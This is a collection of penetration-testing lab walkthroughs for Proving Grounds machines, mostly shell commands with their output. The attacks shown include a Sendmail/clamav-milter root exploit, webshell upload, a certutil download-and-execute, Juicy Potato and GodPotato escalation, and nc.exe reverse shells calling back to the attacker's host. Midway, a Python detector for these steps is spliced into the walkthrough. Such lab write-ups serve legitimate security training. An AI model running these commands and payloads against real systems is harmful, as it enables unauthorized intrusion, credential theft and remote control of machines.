charles@pelican:/opt/zookeeper$ cd ~
cd ~
charles@pelican:~$ ls
ls
local.txt
charles@pelican:~$ cat local.txt
cat local.txt
3be5bda7f0c6a5c389c952b07d8a5861
charles@pelican:~$
privilege escalation – run gcore as root
gcore can be run as root, and the process list shows a process that may leak a password.
charles@pelican:~$ sudo -l
sudo -l
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
charles@pelican:~$ ps aux | grep pass
ps aux | grep pass
root 513 0.0 0.0 2276 112 ? Ss 20:04 0:00 /usr/bin/password-store
charles 12689 0.0 0.0 6076 824 pts/2 S+ 20:46 0:00 grep pass
Dump the running process:
charles@pelican:~$ sudo /usr/bin/gcore 513
sudo /usr/bin/gcore 513
0x00007f971bd1c6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffc3d7a2c80, remaining=remaining@entry=0x7ffc3d7a2c80) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28 ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.513
[Inferior 1 (process 513) detached]
charles@pelican:~$ ls
ls
core.513 local.txt
charles@pelican:~$
Running strings on the core file finds the password ClogKingpinInning731.
Proof
charles@pelican:~$ su root
su root
Password: ClogKingpinInning731
root@pelican:/home/charles# cat /root/proof.txt
cat /root/proof.txt
4e88befdbd6acaf770aad3a9aa9a1bca
ClamAV
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.228.42 | TCP:22,25,80,139,199,445,6000 |
Initial Access – SNMP leak info to RCE
snmp-check shows that clamav-milter is running on the host; a quick search shows it can be exploited for RCE.
[*] Processes:
Id Status Name Path Parameters
1 runnable init init [2]
2 runnable ksoftirqd/0 ksoftirqd/0
3 runnable events/0 events/0
4 runnable khelper khelper
5 runnable kacpid kacpid
99 runnable kblockd/0 kblockd/0
109 runnable pdflush pdflush
110 runnable pdflush pdflush
111 runnable kswapd0 kswapd0
112 runnable aio/0 aio/0
255 runnable kseriod kseriod
276 runnable scsi_eh_0 scsi_eh_0
284 runnable khubd khubd
348 runnable shpchpd_event shpchpd_event
380 runnable kjournald kjournald
935 runnable vmmemctl vmmemctl
1177 runnable vmtoolsd /usr/sbin/vmtoolsd
3768 running syslogd /sbin/syslogd
3771 runnable klogd /sbin/klogd
3775 runnable clamd /usr/local/sbin/clamd
3779 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
3788 runnable inetd /usr/sbin/inetd
3792 runnable nmbd /usr/sbin/nmbd -D
3794 runnable smbd /usr/sbin/smbd -D
3798 running snmpd /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid
3800 runnable smbd /usr/sbin/smbd -D
3805 runnable sshd /usr/sbin/sshd
3883 runnable sendmail-mta sendmail: MTA: accepting connections
3900 runnable atd /usr/sbin/atd
3903 runnable cron /usr/sbin/cron
3910 runnable apache /usr/sbin/apache
3911 runnable apache /usr/sbin/apache
3912 runnable apache /usr/sbin/apache
3913 runnable apache /usr/sbin/apache
3914 runnable apache /usr/sbin/apache
3915 runnable apache /usr/sbin/apache
3930 runnable getty /sbin/getty 38400 tty1
3936 runnable getty /sbin/getty 38400 tty2
3937 runnable getty /sbin/getty 38400 tty3
3938 runnable getty /sbin/getty 38400 tty4
3939 runnable getty /sbin/getty 38400 tty5
3940 runnable getty /sbin/getty 38400 tty6
3997 runnable apache /usr/sbin/apache
Use https://www.exploit-db.com/exploits/4761 for RCE:
┌──(kali㉿kali)-[~/oscp/pg/ClamAV]
└─$ perl 4761 192.168.228.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.228.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sun, 8 Jun 2025 12:40:21 -0400; (No UCE/UBE) logging access from: [192.168.45.228](FAIL)-[192.168.45.228]
250-localhost.localdomain Hello [192.168.45.228], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 558GeLVB004117 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
┌──(kali㉿kali)-[~/oscp/pg/ClamAV]
└─$ rlwrap nc 192.168.228.42 31337
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
403682e06c26da0fad132f92c78aa2c4
Algernon
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.249.65 | TCP: 21,80,135,139,445,5040,9998,14001 …… |
Web Enumeration
Port 9998 shows a site running SmarterMail; looking up exploits, SmarterMail has an RCE vulnerability.
Initial Access
Use https://www.exploit-db.com/exploits/49216, changing the lhost and lport values.
Proof
┌──(kali㉿kali)-[~/oscp/pg/Algernon]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.249.65] 49810
whoami
nt authority\system
PS C:\Windows\system32> type c:\users\administrator\desktop\proof.txt
fde0160c8fd8d1a2c54849555d52f034
PS C:\Windows\system32>
Authby
Ports open: 21 (ftp), 242 (http), 3145 (ftp), 3389 (rdp).
FTP allows anonymous login, but none of the files is readable.
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ ftp anonymous@192.168.113.46
Connected to 192.168.113.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2048|)
150 Opening connection for /bin/ls.
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Apr 15 18:58 log
---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Aug 03 2024 accounts
226 Closing data connection.
ftp>
Inside the accounts folder, three accounts can be seen: Offsec, anonymous and admin.
ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2049|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Aug 03 2024 backup
---------- 1 root root 764 Aug 03 2024 acc[Offsec].uac
---------- 1 root root 1030 Aug 03 2024 acc[anonymous].uac
---------- 1 root root 926 Aug 03 2024 acc[admin].uac
226 Closing data connection.
Log in to FTP with the weak password admin/admin, download the files and inspect them.
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ ftp admin@192.168.113.46
Connected to 192.168.113.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2050|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
ftp> ^D
221 Goodbye.
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ cat .ht* in*
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
<center><pre>Qui e nuce nuculeum esse volt, frangit nucem!</pre></center>
Judging from .htaccess, the FTP directory and the web root are the same path. Cracking the hash yields the credentials offsec/elite; logging in with them succeeds, and the text shown by the site matches what was seen over FTP. Following this reasoning, uploading a webshell via FTP gives RCE.
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ ftp admin@192.168.113.46
Connected to 192.168.113.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||2051|)
150 File status okay; about to open data connection.
100% |********************************************************************************| 30 2.70 KiB/s 00:00 ETA
226 Closing data connection.
30 bytes sent in 00:00 (0.28 KiB/s)
ftp> ^D
221 Goodbye.
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ curl -u offsec:elite http://192.168.113.46:242/shell.php?cmd=whoami
livda\apache
This box is Windows Server 2008 with no PowerShell, so I generated an exe with msfvenom, uploaded it via FTP, and executed the uploaded exe through the webshell.
whoami earlier showed apache, presumably a service account, so a potato-style escalation should work. Checking the privileges confirms SeImpersonatePrivilege is present and can be used.
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.113.46] 49157
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\www>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Because the system type is x86-based, I used Juicy.Potato.x86.exe; both Juicy.Potato.x86.exe and nc.exe were transferred over SMB.
C:\Windows\Temp>.\Juicy.Potato.x86.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Windows\Temp\nc.exe -e cmd.exe 192.168.45.234 6969" -t *
.\Juicy.Potato.x86.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Windows\Temp\nc.exe -e cmd.exe 192.168.45.234 6969" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\Windows\Temp>
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.113.46] 49345
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\administrator\Desktop\proof.txt
type C:\Users\administrator\Desktop\proof.txt
6652a16346292613ff24bbd7f9da8db4
C:\Windows\system32>
Jacko
Ports 80, 139, 445, 9092 and 8082 open.
Port 8082 runs H2 Database; logging in with the default username and an empty password works, and SQL can be executed.
Found an exploit; following its steps gave RCE.
Generate a reverse shell payload with msfvenom:
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp lhost=192.168.45.234 lport=4444 -f exe -o tmp.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: tmp.exe
The shell environment obtained so far is restricted and many commands are unavailable (e.g. dir); the following SQL statement downloads the payload to the target machine.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.234/tmp.exe C:/Windows/Temp/tmp.exe").getInputStream()).useDelimiter("\\Z").next()');
Run it:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/tmp.exe").getInputStream()).useDelimiter("\\Z").next()');
A reverse shell is received, but the environment is just as broken.
┌──(kali㉿kali)-[~/oscp/pg/Jacko]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.245.66] 49828
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
winPEASx86.exe found SeImpersonatePrivilege:
╔══════════╣ Current Token privileges
╚ Check if you can escalate privilege using some enabled token https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation
SeShutdownPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeUndockPrivilege: DISABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
SeTimeZonePrivilege: DISABLED
For privilege escalation, GodPotato-NET4.exe combined with the msfvenom reverse shell exe did not run properly; switching to nc.exe worked. Absolute paths are used throughout here because the environment cannot resolve cmd or powershell.
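From the defender's side, the chain above (the certutil download issued from the H2 service, the binary launched from Temp, the Potato hop from NETWORK SERVICE to SYSTEM, and the nc.exe -e shell) leaves a distinctive process-creation trail. The detector below is an added example, not part of the original write-up: it runs four rules over constructed Sysmon-style process-creation records (process id, parent id, image, command line, user) that mirror the commands on this page. The pids, the H2 java.exe command line and the rule names are my own; the certutil and nc.exe command lines are those shown in the write-up.

```python
"""Process-creation detection for the post-exploitation trail seen above.
Added example: records are constructed to resemble the commands on the
page (Sysmon event ID 1 fields, simplified to dicts); pids, the H2 java
command line and the rule names are assumptions."""
import ntpath

SYSTEM = "nt authority\\system"
SERVICE_ACCOUNTS = {"nt authority\\network service", "nt authority\\local service"}
# Server binaries that should never be spawning shells or tools.
SERVER_IMAGES = {"java.exe", "javaw.exe", "httpd.exe", "w3wp.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
NETCAT = {"nc.exe", "nc64.exe", "ncat.exe"}

NETSVC = r"NT AUTHORITY\NETWORK SERVICE"
SYS = r"NT AUTHORITY\SYSTEM"

# Constructed sample log: the H2 service downloads and runs a binary,
# GodPotato hops to SYSTEM, and nc.exe -e is started as SYSTEM.
EVENTS = [
    {"pid": 700, "ppid": 4, "image": r"C:\Windows\System32\services.exe",
     "cmd": "services.exe", "user": SYS},
    {"pid": 1200, "ppid": 700, "image": r"C:\Program Files (x86)\H2\service\java.exe",
     "cmd": "java.exe -cp h2.jar org.h2.tools.Server", "user": NETSVC},   # assumed cmd line
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil -urlcache -split -f http://192.168.45.234/tmp.exe C:/Windows/Temp/tmp.exe",
     "user": NETSVC},
    {"pid": 1400, "ppid": 1200, "image": r"C:\Windows\Temp\tmp.exe",
     "cmd": "C:/Windows/Temp/tmp.exe", "user": NETSVC},
    {"pid": 1500, "ppid": 1400, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe", "user": NETSVC},
    {"pid": 1600, "ppid": 1500, "image": r"C:\Users\tony\GodPotato-NET4.exe",
     "cmd": 'GodPotato-NET4.exe -cmd "C:\\Windows\\System32\\cmd.exe /c ..."', "user": NETSVC},
    {"pid": 1700, "ppid": 1600, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"C:\Windows\System32\cmd.exe /c C:\Users\tony\nc.exe -e C:\Windows\System32\cmd.exe 192.168.45.234 9999",
     "user": SYS},
    {"pid": 1800, "ppid": 1700, "image": r"C:\Users\tony\nc.exe",
     "cmd": r"C:\Users\tony\nc.exe -e C:\Windows\System32\cmd.exe 192.168.45.234 9999", "user": SYS},
    # Benign: an administrator hashing a file with certutil.
    {"pid": 1900, "ppid": 700, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -hashfile C:\Windows\Temp\update.msi SHA256", "user": r"LIVDA\admin"},
]


def base(image):
    return ntpath.basename(image).lower()


def flags(cmd):
    """Command-line tokens, lowercased, with the -/ flag prefix removed."""
    return {t.lstrip("-/") for t in cmd.lower().split()}


def detect(events):
    """Return (pid, rule) pairs for every record that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        image, user, toks = base(e["image"]), e["user"].lower(), flags(e["cmd"])
        # 1. certutil used as a downloader (urlcache + -f + a URL argument).
        if image == "certutil.exe" and "urlcache" in toks and "f" in toks \
                and any(t.startswith("http") for t in toks):
            hits.append((e["pid"], "certutil_download"))
        # 2. netcat started with -e (program bound to the connection).
        if image in NETCAT and "e" in toks:
            hits.append((e["pid"], "netcat_exec"))
        # 3. A server process spawning a shell, certutil, or anything from Temp.
        if parent and base(parent["image"]) in SERVER_IMAGES and (
                image in SHELLS or image == "certutil.exe"
                or "\\temp\\" in e["image"].lower()):
            hits.append((e["pid"], "server_spawned_tool"))
        # 4. Child runs as SYSTEM although its parent runs as a service account:
        #    the signature of SeImpersonatePrivilege (Potato) abuse.
        if parent and user == SYSTEM and parent["user"].lower() in SERVICE_ACCOUNTS:
            hits.append((e["pid"], "service_to_system_jump"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

Rule 4 is the one worth tuning least: a SYSTEM child under a NETWORK SERVICE or LOCAL SERVICE parent is rare in normal operation, which is exactly why removing SeImpersonatePrivilege from service accounts that do not need it (or running them as virtual accounts with minimal rights) is the mitigation, rather than relying on detection alone.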
PS C:\Users\tony> copy \\192.168.45.234\share\GodPotato-NET4.exe .
copy \\192.168.45.234\share\GodPotato-NET4.exe .
PS C:\Users\tony> copy \\192.168.45.234\share\tmp.exe .
copy \\192.168.45.234\share\tmp.exe .
PS C:\Users\tony> copy \\192.168.45.234\share\nc.exe .
copy \\192.168.45.234\share\nc.exe .
PS C:\Users\tony> .\GodPotato-NET4.exe -cmd "C:\Windows\System32\cmd.exe /c C:\Users\tony\nc.exe -e C:\Windows\System32\cmd.exe 192.168.45.234 9999"
.\GodPotato-NET4.exe -cmd "C:\Windows\System32\cmd.exe /c C:\Users\tony\nc.exe -e C:\Windows\System32\cmd.exe 192.168.45.234 9999"
[*] CombaseModule: 0x140731985952768
[*] DispatchTable: 0x140731988295264
[*] UseProtseqFunction: 0x140731987662864
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\5de5cc0f-2eb8-40a3-b769-1274eb571149\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004002-0534-ffff-3cd7-645c19ac732b
[*] DCOM obj OXID: 0x9f1e3f8045e72f04
[*] DCOM obj OID: 0xdad109f2dcb933a7
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 788 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 864
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.245.66] 50202
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
d66da0e71bd83f0769a6a0518bca75d8
C:\Windows\system32>